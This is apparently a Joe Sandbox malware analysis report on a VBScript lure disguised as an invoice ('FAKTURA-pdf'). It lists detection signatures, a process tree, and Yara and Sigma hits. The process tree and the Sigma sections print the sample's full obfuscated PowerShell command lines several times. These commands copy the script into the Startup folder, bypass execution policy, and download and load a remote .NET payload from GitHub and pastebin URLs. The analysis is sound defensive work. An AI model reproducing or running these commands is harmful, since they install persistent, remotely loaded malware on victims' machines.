Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FAKTURA-pdf-466366332.vbs

Overview

General Information

Sample name:FAKTURA-pdf-466366332.vbs
Analysis ID:1525548
MD5:90bd9fa957050b3641726fd4bb173281
SHA1:4fd94ee79b46a075b9cc10f9ceecaad705a19bf8
SHA256:07565a7b310e8082d9cfdaea1f0990c5b21ec6c08001272414cf63869019aa24
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4648 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6264 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3688 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 5944 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4832INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x251c:$b3: ::UTF8.GetString(
  • 0x2ade:$b3: ::UTF8.GetString(
  • 0x202e1:$b3: ::UTF8.GetString(
  • 0x2d92a:$b3: ::UTF8.GetString(
  • 0x2e042:$b3: ::UTF8.GetString(
  • 0x2e616:$b3: ::UTF8.GetString(
  • 0x30cbf:$b3: ::UTF8.GetString(
  • 0x31281:$b3: ::UTF8.GetString(
  • 0x31d2c:$b3: ::UTF8.GetString(
  • 0x5351e:$b3: ::UTF8.GetString(
  • 0x535cb:$b3: ::UTF8.GetString(
  • 0x53b63:$b3: ::UTF8.GetString(
  • 0x79703:$b3: ::UTF8.GetString(
  • 0x80821:$b3: ::UTF8.GetString(
  • 0x80dea:$b3: ::UTF8.GetString(
  • 0x81aba:$b3: ::UTF8.GetString(
  • 0x821d1:$b3: ::UTF8.GetString(
  • 0x82a44:$b3: ::UTF8.GetString(
  • 0x831a6:$b3: ::UTF8.GetString(
  • 0x84186:$b3: ::UTF8.GetString(
  • 0xc5efd:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 4844INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1593a0:$b2: ::FromBase64String(
  • 0x15a392:$b2: ::FromBase64String(
  • 0x14966:$s1: -join
  • 0x15530:$s1: -join
  • 0x1befc:$s1: -JoIn
  • 0x1c4bd:$s1: -JoIn
  • 0x1c8d6:$s1: -JoIn
  • 0x443fb:$s1: -join
  • 0x44b5b:$s1: -join
  • 0x90a9c:$s1: -JoIn
  • 0x90e36:$s1: -JoIn
  • 0x9193e:$s1: -JoIn
  • 0x971f9:$s1: -JoIn
  • 0x97605:$s1: -JoIn
  • 0x9b0d4:$s1: -JoIn
  • 0x9b4ed:$s1: -JoIn
  • 0x9b907:$s1: -JoIn
  • 0x9bd66:$s1: -JoIn
  • 0x16f0ce:$s1: -join
  • 0x18aa29:$s1: -JoIn
  • 0x18ae35:$s1: -JoIn

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -comma
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0M
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0M
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0M
Sigma detected: Potential PowerShell Command Line Obfuscation
